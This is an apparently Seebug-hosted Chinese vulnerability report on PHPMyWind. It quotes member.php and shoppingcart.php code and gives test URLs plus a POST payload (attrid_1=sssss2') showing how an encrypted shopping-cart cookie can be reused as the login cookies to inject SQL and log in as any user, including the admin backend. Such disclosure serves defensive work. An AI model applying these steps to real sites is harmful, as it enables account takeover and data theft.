PHPMyWind 注入漏洞&任意用户登录

### 简要描述： PHPMyWind 注入漏洞&任意用户登录 ### 详细说明： ``` member.php if(!empty($_COOKIE['username']) &&//从COOKIE里面解密username然后赋值 !empty($_COOKIE['lastlogintime']) && !empty($_COOKIE['lastloginip'])) { $c_uname = AuthCode($_COOKIE['username']); $c_logintime = AuthCode($_COOKIE['lastlogintime']); $c_loginip = AuthCode($_COOKIE['lastloginip']); } else { $c_uname = ''; $c_logintime = ''; $c_loginip = ''; } //验证是否登录和用户合法 if($a=='saveedit' or $a=='getarea' or $a=='savefavorite' or $a=='delfavorite' or $a=='delcomment' or $a=='delmsg' or $a=='delorder' or $a=='avatar' or $a=='getgoods' or $a=='applyreturn' or $a=='perfect' or $a=='binding' or $a=='removeoqq' or $a=='removeoweibo') { if(!empty($c_uname)) { //guest为一键登陆未绑定账号时的临时用户 if($c_uname != 'guest') { $r = $dosql->GetOne("SELECT `id`,`expval` FROM `#@__member` WHERE `username`='$c_uname'");//通过上面的可以看出来源 shoppingcart.php if($a == 'addshopingcart') { //构成选中属性 if(isset($typeid)) { //参数过滤 $typeid = intval($typeid); //获取商品属性 $dosql->Execute("SELECT * FROM `#@__goodsattr` WHERE `goodsid`=$typeid"); if($dosql->GetTotalRow() > 0) {echo 55555; //构成属性字符串 $goodsattr = array(); while($row = $dosql->GetArray()) { //选中的属性构成字符串 if(isset($_POST['attrid_'.$row['id']])) { $goodsattr[$row['id']] = $_POST['attrid_'.$row['id']];//这里的参数可以控制 } } var_dump($goodsattr); } else { $goodsattr[$row['id']] = ''; } } //初始化购物车字符串 if(!empty($_COOKIE['shoppingcart'])) $shoppingcart = unserialize(AuthCode($_COOKIE['shoppingcart'])); else $shoppingcart = array(); //选中信息存入数组 if(isset($goodsid) && isset($buynum) && isset($goodsattr)) { //过滤参数 $goodsid = intval($goodsid); $buynum = intval($buynum); $shoppingcart[] = array($goodsid, $buynum, $goodsattr); } var_dump($shoppingcart); //存入COOKIE setcookie('shoppingcart', AuthCode(serialize($shoppingcart),'ENCODE'));//吧购物车的内容加密之后存入cookie 这样我们就能先利用$_POST['attrid_'.$row['id']]来写入我们的注入shellcode，然后将将得到的shoppingcart的COOKIE改成username就可以达到利用了 echo TRUE; exit(); ``` ### 漏洞证明： 测试方法 打开http://127.0.0.1/mywind/shoppingcart.php?typeid=10&a=addshopingcart&goodsid=1&buynum=1 POST提交attrid_1=sssss2' PS:测试的时候请安装体验数据~需要有一个商品ID即可~ 然后把cookie里面的shoppingcart复制三份 分别改成empty($_COOKIE['username']) & !empty($_COOKIE['lastlogintime']) !empty($_COOKIE['lastloginip']))这三个 然后打开http://127.0.0.1/mywind/member.php?c=default 即可 因为很多地方用到了authdecode cookie 这样我们得到一个加密的值之后 就可以登录任意用户 甚至是后台也是这样验证的 [<img src="https://images.seebug.org/upload/201405/14233527f89cce26df2f14f9bca8b8872cf8e13e.png" alt="cookie.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/14233527f89cce26df2f14f9bca8b8872cf8e13e.png) [<img src="https://images.seebug.org/upload/201405/14233539dabd85fc87eafeb71ddbdea0d7001dc8.png" alt="cookie2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/14233539dabd85fc87eafeb71ddbdea0d7001dc8.png) [<img src="https://images.seebug.org/upload/201405/1423354711c40b503e4580f22010f9628e92f41d.png" alt="inj_error.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1423354711c40b503e4580f22010f9628e92f41d.png)